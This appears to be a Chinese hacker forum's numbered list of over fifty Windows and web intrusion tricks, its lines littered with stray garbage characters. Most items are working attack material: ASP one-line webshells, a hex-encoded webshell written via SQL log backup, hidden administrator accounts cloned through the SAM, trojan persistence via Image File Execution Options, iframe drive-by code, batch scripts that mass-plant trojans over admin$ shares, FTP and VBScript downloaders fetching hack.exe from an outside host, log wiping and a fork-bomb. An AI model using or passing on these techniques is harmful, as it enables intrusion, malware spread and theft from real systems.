Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
) K/ g) J5 [' U/ Y" z! D6 [* icacls C:\windows\system32 /G hqw20:R. b$ P( D4 C7 O! v7 D
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
5 N. O, R4 i M2 u. z恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F) {/ E3 N0 H2 H
, J6 s ]/ H! f* b U& q
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。" g9 [% L0 l5 Q3 _! ?
& T5 R% P R$ E8 F$ M5 a$ ~# s3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
4 u7 L: l. U( E( D n
* X! ~) s4 P7 i$ I& Z) {/ h+ A4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
3 i8 J+ m, M' A$ W! j5 ~& r( G8 X5 P9 i9 f F& l2 \
5、利用INF文件来修改注册表* F. c4 d' m- O
[Version]3 B# p* ?% A4 i2 u- P' Q' T
Signature="$CHICAGO$"/ N4 ?8 _+ t6 k' S! [& f( c
[Defaultinstall]6 d7 a$ p8 @$ I% N) s- C
addREG=Ating
" B5 } L' |5 |5 q0 `$ |4 G' r[Ating]* v/ M, P$ m# U" O, @& l/ d# s
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
+ ~8 x1 V5 c1 z: ~& s" [; z2 p以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:* w& A C5 c K
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
) K1 d' I- A6 }- Y) f7 Y其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU6 |4 h, ~+ Y2 L/ f7 h+ ]7 c8 c
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
* o7 `6 u/ Q: X: rHKEY_CURRENT_CONFIG 简写为 HKCC
& G0 e6 U7 N' j8 a0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值5 N6 f9 ^7 p$ q1 E- g! G2 _
"1"这里代表是写入或删除注册表键值中的具体数据( E8 g( V# E# a! _' Q. ~
5 b( i* ~; w* L% P# ^
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
2 R, X6 L1 L8 A; W5 t多了一步就是在防火墙里添加个端口,然后导出其键值
: e! S! j5 t y, l[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]( |/ _7 [& F/ w' z
5 M, O) W5 [# m, Q7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
$ L9 P0 f3 T; b7 n, C0 o在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
" `0 ?+ e! h& h3 O' A8 j8 q g# n& w& w9 ~; j
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。3 i) s- Q. s5 u" d C
Y4 v4 E3 [& s+ \ X) [9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,# X, k, v9 g' k2 p) `. y/ Y
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。 F' o- l3 N- Z1 \
' Q Z4 |5 w2 ` y8 }; a
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”- ^0 I7 L3 g/ }2 V3 m
" v; m1 \, }( i4 f3 F& z11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
0 i: p5 I" k7 p- ^5 R用法:xsniff –pass –hide –log pass.txt3 F$ `% }! _' k% N j
+ w6 }8 W3 i: s2 r8 `* t8 o$ q: ]
12、google搜索的艺术
+ ^# G+ x) n6 e5 l x6 P搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”, R6 a, V2 X: y$ b9 g- X
或“字符串的语法错误”可以找到很多sql注入漏洞。
6 t; h. A$ ^; W4 A7 |/ K3 `& t9 {6 z% T9 Z9 |: `0 a
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。! H! [0 G5 v# X) Y" S
& [ H. R+ `6 m" H9 M. [ {: x& T14、cmd中输入 nc –vv –l –p 1987, }' P' P! T: d, I+ ^
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
& r- Z9 g/ R+ \4 T% Z; _3 E: ^7 }; K& P7 N. R) b I/ s( |& K
15、制作T++木马,先写个ating.hta文件,内容为& d* ~8 K4 M9 }: i& G& d5 S
<script language="VBScript">8 W/ Y5 m- j, k) |: P( M% S- ^- T
set wshshell=createobject ("wscript.shell" )2 }" H# E T4 T( Z% o1 p+ _
a=wshshell.run("你马的名称",1), o8 A n& v" H! n1 N" R, N9 Y! `
window.close! d' p9 Y' f* [5 ]- S8 y) Y1 I' a
</script>
9 C8 W7 P# j. u0 z3 U再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
5 L# S! Q1 `/ k6 Y% {3 y
& g. X! Y* }! U5 e16、搜索栏里输入
) X+ d+ u: w$ }- ~关键字%'and 1=1 and '%'='; O7 }9 C' s7 F7 S% z
关键字%'and 1=2 and '%'=') x( J( `9 N, I% |+ x) q _
比较不同处 可以作为注入的特征字符
+ L' L$ {3 B7 L+ j5 s; t! A" r: }8 \2 S& U
17、挂马代码<html>
% C1 a5 f9 f4 j k. _; D<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
# t j0 G2 q2 h; z- M( o</html>
: E. J8 D% j1 r; h8 s0 r' O" d$ o0 j* k$ ]
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
" G' [: S4 J- ~% [net localgroup administrators还是可以看出Guest是管理员来。
; E( \# E0 O2 z' _( P0 Z0 v l, S8 J/ |& J2 n
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
1 W1 d, }- \6 O. o9 l- r用法: 安装: instsrv.exe 服务名称 路径
, P/ Q+ W( u6 _& D( F& [卸载: instsrv.exe 服务名称 REMOVE
/ z; D/ o; _9 Y/ R" k Q: b" Q; s. ?( T; J' f
6 P) A$ g3 l% t' S, S
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉. d! j6 s" A& e! D0 ]4 G& Q
不能注入时要第一时间想到%5c暴库。
0 k9 ^/ Y6 D0 X0 E6 o; k$ L( p6 P4 p+ G
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~" E& d8 o$ h0 l$ O+ l- I( J4 _
2 U/ l" ?" K- K23、缺少xp_cmdshell时
; b. t2 b7 S" x# {$ S Y: q$ I' V尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
9 @: }" u; H9 b, Z- s: ~假如恢复不成功,可以尝试直接加用户(针对开3389的)
/ V' D& Y( }; h( xdeclare @o int# M/ y: B- V I3 d( f
exec sp_oacreate 'wscript.shell',@o out0 C; v& {+ k' W9 i7 I' g* E$ \
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
) |3 ]. Y& u" A
( C, z5 A) r. D: S& `6 E- Z6 I24.批量种植木马.bat
' Y! S; j% o p$ Y% @7 h! lfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
4 J2 f- \/ |$ q3 c; i" Rfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
" S# }5 I( u( D; ]扫描地址.txt里每个主机名一行 用\\开头
+ o1 v0 h9 U4 g6 h4 t& b2 z5 R6 H' P: c" v- e9 p: ^* i$ S" {1 x
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
& _* f6 [0 q; u& _
8 d7 R e4 B1 `# M2 i* t& J26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.# W# e I& g U/ \! }% \0 K' B- F" X
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
/ j+ P; I" A0 W9 l# P.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
/ j' G/ m" \# Q, q2 s8 H
" v) O! f5 m. U3 D8 D; l. u# l27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
/ H2 j/ k3 @$ H8 c) p9 ?0 U( W. T9 x然后用#clear logg和#clear line vty *删除日志
! ?! b4 t2 d# v1 p. H9 ^& _% B @3 M& L. C
28、电脑坏了省去重新安装系统的方法
) w0 W, v/ p( M3 Q" u纯dos下执行,
/ n% |, Q: }, z! G# o; I8 Cxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
, [* [( Y; c- j& v8 O2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config( P2 b ~# f& p
# O& w3 e! ^. D$ D29、解决TCP/IP筛选 在注册表里有三处,分别是:" N7 c4 P U Y* K$ y& [
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip0 p" U' Q/ s1 ?: m1 z7 S' f% E
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip! \ ?8 d3 f' l8 r* a2 P
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# O3 h# u6 A: j5 @' r) ~0 {6 m8 k分别用
* d/ Z. T2 b& o) q7 b0 Uregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
$ c2 \ k- C9 f' Fregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip6 z, n5 ]: g/ b/ F$ e# S& Q
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip. f% S2 H! ?: w1 P5 b) }
命令来导出注册表项
$ V( I6 R. o; C3 O+ B0 m8 w然后把三个文件里的EnableSecurityFilters"=dword:00000001, D/ W" w9 ]" I, k f
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
, f1 i* g. i$ X8 {: C/ xregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。7 B8 g; j7 t Y+ u2 |( D
# t) b" n/ K5 Z8 u7 U: w9 ^30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
( j/ J+ T- Q! S v3 P5 fSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3" M) |% w. u5 n: ` C
0 W/ Z2 d6 L6 z3 S7 _3 l31、全手工打造开3389工具% _8 |: g( N" A4 M. h( ]
打开记事本,编辑内容如下:
h: J* l+ K/ F0 uecho [Components] > c:\sql
4 j5 O f. o' S/ \echo TSEnable = on >> c:\sql0 k8 c- _0 U" `" L
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
2 B* d; s, U8 t! S/ \编辑好后存为BAT文件,上传至肉鸡,执行
: O5 b/ [+ C) ^" k& [
; [4 Q0 y0 C+ A; s" n; B! _$ _; T32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
* P- k5 ~0 c; V- g# e8 Z! D
, p0 H- e9 m1 F3 p33、让服务器重启
; K9 Q9 q. H9 S/ @/ n% D6 ^& I写个bat死循环:9 i1 T2 L' p" t b
@echo off
7 V- V! x6 i& r9 c" p:loop1
+ d; h9 a: e# ]3 [+ E* @cls$ o, k* W2 Y+ U- f$ |. b
start cmd.exe
9 `- \' z0 `+ c6 @2 u3 s4 ygoto loop1
+ p/ M- J6 x* o保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启3 Z0 O5 F- Y/ {1 I6 H; ?1 E
) c. i7 d P* o2 \* B
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,: a! c. a, v6 a4 w) [9 c i4 H
@echo off
4 ^, b( P6 D: }3 J1 ldate /t >c:/3389.txt3 E/ G' E; r6 E0 K6 i( U
time /t >>c:/3389.txt
. j [* }; H4 q' B, W+ Oattrib +s +h c:/3389.bat0 Q7 G# B5 \' T( U1 M- ?
attrib +s +h c:/3389.txt& e8 U) e7 C6 j9 S. H5 T' }- }
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
) Y) O3 \8 {' L, K" H并保存为3389.bat! C) |* o u0 f
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
) k2 ]. H3 H- d3 E Z/ p# u7 a
! u; \+ V1 p$ G% M! A35、有时候提不了权限的话,试试这个命令,在命令行里输入:7 c1 ~7 J. h" i6 [: A3 t. Y
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
4 C/ M3 I# G* X3 B输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。# }5 T" h, d& }# I) Z& p
/ I* G8 t& L. q( b; O# d+ L
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
- f) k$ n, R, H5 j4 ?echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址2 j+ d6 C7 @4 F
echo 你的FTP账号 >>c:\1.bat //输入账号
- j9 D3 h# L* |& W- V* I. Iecho 你的FTP密码 >>c:\1.bat //输入密码
, h3 _$ a+ c( Secho bin >>c:\1.bat //登入
' f+ A8 z* x! _) f, ]echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
% x5 r: R, M$ s1 Y" W2 necho bye >>c:\1.bat //退出
6 J5 K* ]9 W& Y, ?3 S2 d$ W( b" `然后执行ftp -s:c:\1.bat即可
+ }4 I1 }- f8 Q& D; X; r% M' v( \2 }& @0 i
37、修改注册表开3389两法0 }! S8 D* ^; E' s+ O- P7 h! T
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表1 R+ c5 c5 L2 M3 @( Q! G/ h! p
echo Windows Registry Editor Version 5.00 >>3389.reg. O+ D0 y6 R. L1 @& _" ^
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg( o" d- j# a- c2 s& K
echo "Enabled"="0" >>3389.reg8 m# d3 X4 X6 X r
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
* `+ E+ Q2 n j3 {NT\CurrentVersion\Winlogon] >>3389.reg
( B& U4 A( Y& Recho "ShutdownWithoutLogon"="0" >>3389.reg
( m) f8 y2 f* {- u8 h Q1 ]6 U1 c u* [& fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]7 Q2 B1 h8 s+ `2 n8 d
>>3389.reg
7 {8 Z. H0 v; wecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg3 H' x% Q/ O9 n: l7 H
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
, B+ j& `; F3 M) y1 H! @>>3389.reg
0 S+ I; A* n* y2 }1 \# o6 Fecho "TSEnabled"=dword:00000001 >>3389.reg3 F/ L/ o4 w0 N+ F6 e
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
6 f" R& w% v. J7 Oecho "Start"=dword:00000002 >>3389.reg
& z5 o6 m% X8 t/ L3 Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
$ h# [% }; f* C. P>>3389.reg
* Q4 i% w! a4 \# k Yecho "Start"=dword:00000002 >>3389.reg
# K9 r; D# T) j' x9 `( becho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
0 A' k/ ^7 j- x: ]# Oecho "Hotkey"="1" >>3389.reg+ ]& Q9 c. H) u' g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal g9 w; J0 p. s# {' K/ ~
Server\Wds\rdpwd\Tds\tcp] >>3389.reg6 C6 ?0 l9 W. }* X2 U8 I
echo "PortNumber"=dword:00000D3D >>3389.reg
5 S( O8 J# T7 n- @- M! v. e( J% E/ pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal+ @! ]$ M+ c& x, | V8 }0 }
Server\WinStations\RDP-Tcp] >>3389.reg
# _8 p$ R5 W0 Oecho "PortNumber"=dword:00000D3D >>3389.reg
8 _- E, {( T! r7 @8 _把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。8 `7 L1 |; g0 G6 d( w% f: p
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)8 p) p/ r2 Q8 [$ \# C
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效5 |( ?1 K; V1 ~2 z7 c h7 q) T" i
(2)winxp和win2003终端开启2 a/ Y4 S: }, U! }8 @$ I
用以下ECHO代码写一个REG文件:
, }6 X% U) }! L# hecho Windows Registry Editor Version 5.00>>3389.reg4 _5 V. V. N4 g
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' P. @8 r4 K3 n( e& r
Server]>>3389.reg6 W& z# }: L9 ?; j, g9 u$ B
echo "fDenyTSConnections"=dword:00000000>>3389.reg
9 K6 J7 u/ c2 vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ A& z$ w0 h4 bServer\Wds\rdpwd\Tds\tcp]>>3389.reg
6 `4 q G: f7 L' [$ lecho "PortNumber"=dword:00000d3d>>3389.reg: x# e/ G9 c- E, N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
% I, ?( I0 [5 `7 JServer\WinStations\RDP-Tcp]>>3389.reg+ Q* P I7 R0 ^& I4 O. e
echo "PortNumber"=dword:00000d3d>>3389.reg$ N1 m3 ~" A* Z- h+ E& |2 u y; O5 T$ c
然后regedit /s 3389.reg del 3389.reg
" l" B* u A8 }8 D5 qXP下不论开终端还是改终端端口都不需重启
% C( \" m i; ^! p3 [4 f
% f$ l' v9 n% A: |! x38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
% S( K6 Q+ S5 R4 J4 V用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'4 p# x9 x: G( S
+ {$ K3 k% y7 m+ ^
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
( M+ a$ I' H5 v$ }4 H% n(1)数据库文件名应复杂并要有特殊字符# X8 n+ M; T \) M9 b
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
8 f" S8 z9 Z5 M% i将conn.asp文档中的* k" d7 e1 _2 J1 V) _
DBPath = Server.MapPath("数据库.mdb")
" _+ t( w P! L) Uconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath | C& \/ C& S$ H
6 C& J k9 a2 P& ~; C$ y6 t/ W
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置+ N% s4 N9 H" i' J T
(3)不放在WEB目录里2 Y# l0 P V" Z0 {& {
+ d/ S2 ~. ]% @40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
' I7 B6 H& ~- _, J可以写两个bat文件7 n; b$ a4 d; S) m1 f4 k [) r
@echo off
4 E" W: w! i0 d7 [@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
: V2 f% c/ F( E8 Y) Y0 z3 ]@del c:\winnt\system32\query.exe# U, L. I+ J* ], |7 a6 ?
@del %SYSTEMROOT%\system32\dllcache\query.exe
6 r+ I. D: T8 P B6 q0 m H: ?@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的' w/ @# k% K7 l5 H* {$ A
9 o6 S) z- I) t' E& Q! @; `! {' p4 P
@echo off
: Q P( \7 ` Y" H# W! ~@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe% b/ l1 z3 y" Y3 p! w+ U6 \; u, a
@del c:\winnt\system32\tsadmin.exe
" N, Q9 M7 ~. }; |1 e3 }@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
1 O9 t* V2 d, u, p- G& |# n. o( i8 _* O7 A- L1 d
41、映射对方盘符+ E% _( a J; U! I& ?
telnet到他的机器上,
4 U' M' _: V6 b5 j5 enet share 查看有没有默认共享 如果没有,那么就接着运行4 |; r6 M# y3 r+ s0 c. d, [) F. M) T
net share c$=c:! e$ z* k% l9 V+ L
net share现在有c$( A" T$ E W% ]8 i2 C( N: g$ p
在自己的机器上运行/ _+ U1 x, N1 s% z6 O' g: n
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
! D2 F7 _' ?" o$ i5 J8 S( t4 n4 Q3 s9 o" w: e
42、一些很有用的老知识, t1 o/ x0 D+ m7 a% `% s
type c:\boot.ini ( 查看系统版本 )
/ f# f6 {$ D9 a2 i0 E$ H- I+ W# Rnet start (查看已经启动的服务)
9 k. s }' `' T* |# Yquery user ( 查看当前终端连接 )& _- N! u& r) }; p( i3 I
net user ( 查看当前用户 ), H( y9 B7 Y; @* G
net user 用户 密码/add ( 建立账号 )$ I8 W5 U: E" `. A8 N
net localgroup administrators 用户 /add (提升某用户为管理员)3 x* L+ T9 J2 ~
ipconfig -all ( 查看IP什么的 )7 b- J. C- ?0 z* q5 b O8 a1 O. p
netstat -an ( 查看当前网络状态 )3 L! s+ m' g2 V6 E. n# V3 K& G
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码): R, I7 |8 \ g4 @
克隆时Administrator对应1F4
+ f* r5 P& z5 F- xguest对应1F52 [# G, o7 c4 X* d
tsinternetuser对应3E8- b* ]4 p! v7 X7 T
5 M6 ~8 K2 ~9 L* p' c, B43、如果对方没开3389,但是装了Remote Administrator Service
4 S# f0 [- j( T: n, @, T用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
4 {0 y% g4 ?6 k解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
6 L# x% {0 k2 H5 ]7 P先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"; D! S3 A1 \( v9 M' h' y" y1 i/ u
! q# ]2 m% m& P+ S
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
0 r* B, R+ V6 _: D( j+ F2 z/ R本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)7 X. G& y; L* O, C' v
3 e9 e, |* k0 l. Q% m2 U! H& y45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)$ b' o& g/ @$ b. n
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
4 F4 [4 K& g+ k3 p: E^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
1 A% A, i2 Y& v4 G. ^4 ~' wCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
- ^& q$ \% g: W0 o1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
2 [: j/ ?0 a2 I7 m(这是完整的一句话,其中没有换行符)
) }8 \' i8 Y5 K K然后下载:: i, }9 g+ l" M2 A F p, F
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
! h# _# y' y' _4 c0 h: H. f5 H* u3 D G0 H W- @' }
46、一句话木马成功依赖于两个条件:3 q0 g8 i) b* m J0 ^- N4 M
1、服务端没有禁止adodb.Stream或FSO组件7 ~: f5 d1 V- n+ M5 U
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
8 G0 F3 h) f5 [ a# X2 a
2 r- J4 B5 T y7 E$ H. r47、利用DB_OWNER权限进行手工备份一句话木马的代码:9 Q, b% c/ m2 X
;alter database utsz set RECOVERY FULL--+ n: }# {; R( }$ _: b# D
;create table cmd (a image)--, O% n! }6 ]3 r
;backup log utsz to disk = 'D:\cmd' with init--
) p/ L0 Y7 j' c2 V$ X1 ?$ s& B;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--5 n. L- t8 b* q9 W
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
' K! P0 \/ e8 h; v& C1 L注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。( Y' S) I3 A; N0 |- R
! H( U8 o# }+ t: r0 m! A48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
4 d3 J' V; r; h1 @# ^ R* Z- }, D8 z' |& v$ H; z7 a @
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options- b+ h6 E0 p' ]+ Z4 x' Z2 }8 D; L
所有会话用 'all'。/ u$ U# {3 `2 V+ K2 ]1 d
-s sessionid 列出会话的信息。
7 ^+ [; S" u# B-k sessionid 终止会话。
- n0 d* l: e5 W- y; r$ I-m sessionid 发送消息到会话。1 b$ K5 l, L1 j' S! x
: u2 b7 p: \5 _9 B" a% p! ?
config 配置 telnet 服务器参数。
/ H# J9 b9 I) c: w3 C- o3 W J8 K4 | j8 L+ V: }4 X
common_options 为:- F2 S% t9 z, Q) s/ t- |
-u user 指定要使用其凭据的用户
* K. z$ u4 |/ v: |! l _-p password 用户密码7 R5 E0 y: r$ O! B5 o2 V- V
$ c" I$ h2 U% \+ d7 F8 v2 K3 ~3 `config_options 为:
5 ~) c4 }% r6 O3 i. D8 Idom = domain 设定用户的默认域6 y) V* G* Z0 l8 o. w9 q0 O
ctrlakeymap = yes|no 设定 ALT 键的映射
4 j4 T+ `: z' o9 e- D- S; g% xtimeout = hh:mm:ss 设定空闲会话超时值$ P1 f3 C0 y6 n
timeoutactive = yes|no 启用空闲会话。
2 S! Z" @, Y6 x. i; I3 v. d3 n8 ^maxfail = attempts 设定断开前失败的登录企图数。7 h5 C/ W" ^- S* e! B- B
maxconn = connections 设定最大连接数。
: h8 t7 M' t6 nport = number 设定 telnet 端口。3 @" Y8 P5 m; [
sec = [+/-]NTLM [+/-]passwd
- e7 z) f* [) t9 T3 d设定身份验证机构
6 W! a! e3 j! m) @) g6 M) q4 C+ kfname = file 指定审计文件名。3 } z4 }6 l+ z* K$ E- g6 l
fsize = size 指定审计文件的最大尺寸(MB)。" B* M ^) G/ I( J0 l4 e
mode = console|stream 指定操作模式。
8 L6 h1 V0 `1 F- k5 c" q' U$ o( _auditlocation = eventlog|file|both
; y* e" M8 e" ^指定记录地点- T+ L7 P3 i8 `$ U
audit = [+/-]user [+/-]fail [+/-]admin; J" b; @. M- {- b' J
" L: P! K% l* m0 l1 }49、例如:在IE上访问: L% ]* h, C) ?- Y. y
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/6 H y2 B* Y0 J7 Q% E
hack.txt里面的代码是:
. E4 x# T9 ^" C: i2 s<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">! ~: ^/ d7 X, o" u9 ]) m
把这个hack.txt发到你空间就可以了!
- D0 c- `% o5 m# _) _) x3 t" z这个可以利用来做网马哦!1 G. g4 o, }; V
+ D- o' r+ _* S; j# q" C
50、autorun的病毒可以通过手动限制!( h5 ?! a5 B3 Y% l3 n1 l
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
+ n, h9 Z& N/ Z2 A2,打开盘符用右键打开!切忌双击盘符~5 U! H8 r$ f3 s6 z
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!# G6 Z% n1 w$ `; [ b
! t C* W, _1 h+ t5 \3 O1 c
51、log备份时的一句话木马:8 c! \1 @/ ?- E* i
a).<%%25Execute(request("go"))%%25>
; A+ X. m! V4 i& z$ fb).<%Execute(request("go"))%>0 w3 `. q }) n$ ~7 U% L% n! W5 I6 l
c).%><%execute request("go")%><%: \& w6 d; g! k _' ^ T
d).<script language=VBScript runat=server>execute request("sb")</Script>7 a7 N4 b! z4 u& e3 Q7 T, b
e).<%25Execute(request("l"))%25>
: ~. C3 b% p$ o; hf).<%if request("cmd")<>"" then execute request("pass")%>
# c: A/ P" k7 v' U7 ^7 r; [9 j# z4 a- u6 l$ R
52、at "12:17" /interactive cmd) [: Z6 w n8 h1 f& Y% q( o
执行后可以用AT命令查看新加的任务
2 W- X1 m, I8 `- H% |# ]& z5 _, i用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
